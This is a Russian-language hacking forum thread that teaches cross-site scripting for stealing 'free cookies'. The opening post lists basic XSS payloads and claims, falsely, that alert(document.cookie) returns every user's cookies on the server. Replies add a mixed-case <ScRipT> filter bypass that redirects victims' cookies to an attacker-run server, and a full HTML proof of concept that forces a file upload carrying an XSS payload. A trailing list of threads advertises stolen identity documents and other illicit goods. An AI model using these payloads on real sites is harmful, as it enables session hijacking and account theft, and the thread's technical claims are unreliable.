Интересно XSS, или как получить халявные cookie Ч1.

9779

Original poster
Pro Member
Сообщения
83
Реакции
26
Посетить сайт
XSS, или как получить халявные cookie
1623090620566.png
XSS - опаснейшая уязвимость веб приложений по мнению ведущих it империй и крупных лабораторий кибербезопасности.
qwasp, google, mozilla, apple, kaspersky, и многие другие нанимают целые кибервойска для защиты своих систем.
а нам че, а мы научимся)
на каждом сайте в интернете есть поля ввода, input'ы . и на многих сайтах есть критическая уязвимость, с помощью которой можно задавать js команды прямо в input. пример такой атаки:

<script>alert('9779')</script>

вместо алерта можно вставить любой js код,. но это только начало. если скрипт выше не сработает, попробуем еще один способ. есть у нас условный месcенджер, и он нам до жути не нравится. можно применить такую штуку:

<img src="/" anerror="alert('done')"/>

кстати, строка ввода url тоже считается за input поэтому можно применить вот такую штуку(на момент окончания написания мануала уязвимость была погашенна)

https://otvetkin.info'onerror="alert('done');"

Круто, да? но что нам дают эти алерты?
А теперь поговорим про куки)

alert(document.cookie);

при вводе этого, мы получаем куки всех пользователей на сервере, и нам выбросится уведомление с ними. но можно отсортировать поиск:

JavaScript:
document.cookie = "user=John";
alert(document.cookie);
вы увидите огромное количество куков, я уверяю.
// специальные символы (пробелы), требуется кодирование
let name = "my name";
let value = "John Smith"

// кодирует в my%20name=John%20Smith
document.cookie = encodeURIComponent(name) + '=' + encodeURIComponent(value);

alert(document.cookie); // ...; my%20name=John%20Smith

Надеюсь, что вам понравилась статья, и вы ее дочитали))
Вопросы По статье писать @Pickmoonpeek или @notAHackerRealy в телеграм
Скоро 2 часть!)
 
  • Like
Реакции: Admin

AngelXXXanax

Member
Сообщения
5
Реакции
9
Посетить сайт
XSS, или как получить халявные cookie
Посмотреть вложение 5442
XSS - опаснейшая уязвимость веб приложений по мнению ведущих it империй и крупных лабораторий кибербезопасности.
qwasp, google, mozilla, apple, kaspersky, и многие другие нанимают целые кибервойска для защиты своих систем.
а нам че, а мы научимся)
на каждом сайте в интернете есть поля ввода, input'ы . и на многих сайтах есть критическая уязвимость, с помощью которой можно задавать js команды прямо в input. пример такой атаки:

<script>alert('9779')</script>

вместо алерта можно вставить любой js код,. но это только начало. если скрипт выше не сработает, попробуем еще один способ. есть у нас условный месcенджер, и он нам до жути не нравится. можно применить такую штуку:

<img src="/" anerror="alert('done')"/>

кстати, строка ввода url тоже считается за input поэтому можно применить вот такую штуку(на момент окончания написания мануала уязвимость была погашенна)

https://otvetkin.info'onerror="alert('done');"

Круто, да? но что нам дают эти алерты?
А теперь поговорим про куки)

alert(document.cookie);

при вводе этого, мы получаем куки всех пользователей на сервере, и нам выбросится уведомление с ними. но можно отсортировать поиск:


JavaScript:
document.cookie = "user=John";
alert(document.cookie);
вы увидите огромное количество куков, я уверяю.
// специальные символы (пробелы), требуется кодирование
let name = "my name";
let value = "John Smith"

// кодирует в my%20name=John%20Smith
document.cookie = encodeURIComponent(name) + '=' + encodeURIComponent(value);

alert(document.cookie); // ...; my%20name=John%20Smith

Надеюсь, что вам понравилась статья, и вы ее дочитали))
Вопросы По статье писать @Pickmoonpeek или @notAHackerRealy в телеграм
Скоро 2 часть!)
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

 $isempty = true;

} else {

 echo '<pre>';
 echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
 echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
photo_2021-06-07_17-16-40.jpg
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
photo_2021-06-07_17-24-08.jpg
 
  • Like
Реакции: Admin и 9779

AngelXXXanax

Member
Сообщения
5
Реакции
9
Посетить сайт
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
Ещё интересная тема это Reflected XSS via File Upload. На первый взгляд, кажется простой задачей. Но оказывается, что подсунуть пользователю отправку произвольного файла из браузера без действий пользователя не так уж просто. Нам всегда в таком случае надо чтобы пользователь открыл страницу, после из JS создать на странице форму с уже подставленным файлом, и после перенаправить его на уязвимую страницу вместе с загруженными данными. В этом случае ни как не помогут ни XMLHttpRequest, ни fetch, о которых вы сначала могли подумать. Но! Для содержания файлов объект input имеет поле input.files, которое представляет собой объект FileList. И до какого-то времени мы не могли его изменять (он считался immutable) и создавать кастомные FileList объекты, кроме возможности изменять его через объекты полученные из события DataTransferEvent (Т.е. когда юзер сам перетаскивал файлы на экран). Но в 17 году ребята обнаружили возможность вызывать конструктор объекта DataTransfer , который порождает изменяемый объект FileList, который мы можем наполнить своими произвольными файлами из кода JS. Вот простой пример:
JavaScript:
<!DOCTYPE html>
<html>
<body>
 <form id="" action="https://example.com/convert-file" method="POST" enctype="multipart/form-data">
  <input id="file" type="file" name="file"/>
  "/>
 </form>

 <script>
  class _DataTransfer {
    constructor() {
     return new ClipboardEvent("").clipboardData || new DataTransfer();}
  }

  const input = document.querySelector('input');
  const file = new File(['<img onerror="alert(\'Domain: \'+document.domain+\'" src="x" />'],"name.html",{type:"text/html"})

  const dt = new _DataTransfer();

  dt.items.add(file)

  input.files = dt.files;

  document.forms[0].submit();
 </script>
</body>
</html>
 
  • Like
Реакции: Admin и 9779

NothingButAnything

New Member
Сообщения
1
Реакции
0
Посетить сайт
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
cпасибо, очень интересно
 

9779

Original poster
Pro Member
Сообщения
83
Реакции
26
Посетить сайт
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
опять ты решил доебаться)))) за штуку с php кстати большое спасибо)) я не знал если честно
 

9779

Original poster
Pro Member
Сообщения
83
Реакции
26
Посетить сайт
Но в 17 году ребята обнаружили возможность вызывать конструктор объекта DataTransfer , который порождает изменяемый объект FileList, который мы можем наполнить своими произвольными файлами из кода JS. Вот простой пример:
Это имба получается)
 

x2x_

New Member
Сообщения
1
Реакции
0
Посетить сайт
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

 $isempty = true;

} else {

 echo '<pre>';
 echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
 echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
<img src="" onerror="alert(1)"> ....?
 
Название темы
Автор Заголовок Раздел Ответы Дата
F XSS - Сборник инструментов Уязвимости и взлом 0
Forevonly Руководство по применению: как обойти XSS-фильтры Полезные статьи 0
klobald Уроки по XSS: Урок 3. Контексты внедрения XSS Уязвимости и взлом 0
klobald Уроки по XSS: Урок 2. Скрытая передача данных, перехват нажатия клавиш, изменение внешнего вида сайта, подцепление на BeEF, фишинг, подсказки обхода ф Уязвимости и взлом 0
klobald Уроки по XSS: Урок 1. Основы XSS и поиск уязвимых к XSS сайтов Уязвимости и взлом 0
Forevonly Skipfish - Сканер безопасности веб-приложений для определения XSS, SQL инъекции, а также Shell инъекции Kali Linux 0
X нашел xss , что делать дальше? Вопросы и интересы 0
Admin XSS атаки с помощью Referer'а Уязвимости и взлом 0
ins1der Инжектим скрипт beef используя XSS Полезные статьи 4
Admin Приключения xss векторов в необычных местах Уязвимости и взлом 0
pw0ned Golden-Bird.biz XSS Другое 4
Admin Cyber Industries - Активная XSS Уязвимости и взлом 0
Admin Выжимаем максимум пользы от XSS Уязвимости и взлом 1
Admin Hotmail - xss Уязвимости и взлом 0
Admin Mail ru - xss Уязвимости и взлом 1
Support81 SiCat: революция в поиске эксплойтов или новый инструмент хакеров? Новости в сети 0
Support81 Взлом или небрежность? Код и пароли Binance были доступны на GitHub в течение нескольких месяцев Новости в сети 0
Support81 ТикТок обретает вторую жизнь в России: сбой или новая стратегия? Новости в сети 0
TrashHellSoDomy Интересно Такие точные сведения.. или команды.? Свободное общение и флейм 0
Support81 Важно!!! Создаем свой VPN с защищенным от блокировок протоколом AmneziaWG, или WireGuard на максималках Анонимность и приватность 3
Support81 Обычный новый подписчик или полицейский в гражданском? Новости в сети 0
Support81 UNC4841 — настоящие спецагенты или просто хакеры высокого класса? Новости в сети 0
Support81 Договор ООН о киберпреступности: новые стандарты или орудие репрессий? Новости в сети 0
Support81 Monti и Conti: новая звездная пара в мире кибервымогательств или просто совпадение? Новости в сети 0
Support81 Шифровальщик Wagner: вымогательство, вербовка или пустой звук? Новости в сети 0
Support81 70 миллионов или 10 терабайт информации: чем обернется взлом TSMC для мира микросхем? Новости в сети 0
O Я ищу работу. Мошенничество/афера, денежные мулы или другой бизнес в Турции Ищу работу. Предлагаю свои услуги. 3
P Закрыто Я могу выступить посредником по сделке между моими американцами и вами по покупке чистых или заюзанных доков. Корзина 1
websprojekt Продам Крипто биржа | Crypto exchange для ТТ тимы или индивидуального использования Куплю/Продам 2
olivander Продам ПРОДАЖА или ОТРАБОТКА APIKEY/SECRETKEY + скрипт Автовывода приватников Финансы - биллинги, банки, кошельки, логи 1
Protectron Нужна консультация действующего(предпочтительнее) или бывшего банковского работника Ищу работу. Предлагаю свои услуги. 0
M На проверке Заказать Комментарии - Отзывы в Telegram Канал или Чат Ищу работу. Предлагаю свои услуги. 2
V Куплю Ищу ТОО или ИП Казахстан Куплю/Продам 1
D Как поставить лайк? или убрать хайд? может ли не показываться кнопка лайка? Вопросы и интересы 7
P Закрыто Продаю юзанные комплекты(права,айди карты с двух сторон) по Сша без селфи или с селфи Корзина 2
M Германия.В продаже юзанные комплекты вместе с селфи или без селфи(смотрите видео доказательство). Корзина 0
M В продаже юзанные украинские айди карты с двух сторон с селфи или без селфи+прописка(смотрите видео доказательство). Корзина 0
M В продаже юзанные рф комплекты вместе с селфи или без селфи(смотрите видео доказательство). Корзина 0
Z Мне нужно купить веб -оболочку или cpanel Корзина 1
Deni4ka Закрыто Брут акки или акки с токенами от Chaturbate Корзина 2
V Куплю Ищу ТОО или ИП Казахстан Куплю/Продам 1
fx7support Подарок акция до 20000 руб. или месяц бесплатно. Тинькофф Инвестиции. Другое 0
wallet_dat Ожидает оплаты Утерянный или забытый пароль кошельков Bitcoin core Куплю/Продам 111
B Интересно можно ли брутфорсить инстаграм или гмейл в 2022 ? Куплю/Продам 0
DIPHENY Нужен человек с банком Левобережный или Faktura Предоставляю работу. Ищу специалиста. 0
JDev Мобильные LTE прокси или анонимные ipv4: преимущества и недостатки каждого типа прокси SSH / дедики / Vpn / Proxy / Socks 21
fx7support Партнерка «Секс по телефону по предоплате» или «обратный звонок» Способы заработка 1
M Куплю Куплю или залью симкарты Тинькофф Мобайл. Куплю/Продам 2
S Коронавирус - реальная угроза или манипуляции? Свободное общение и флейм 4
mickey7091 Даю разовые или постоянные работы отрисовщикам(общий бюджет 500 долларов-смотрите видео доказательство). Предоставляю работу. Ищу специалиста. 4

Название темы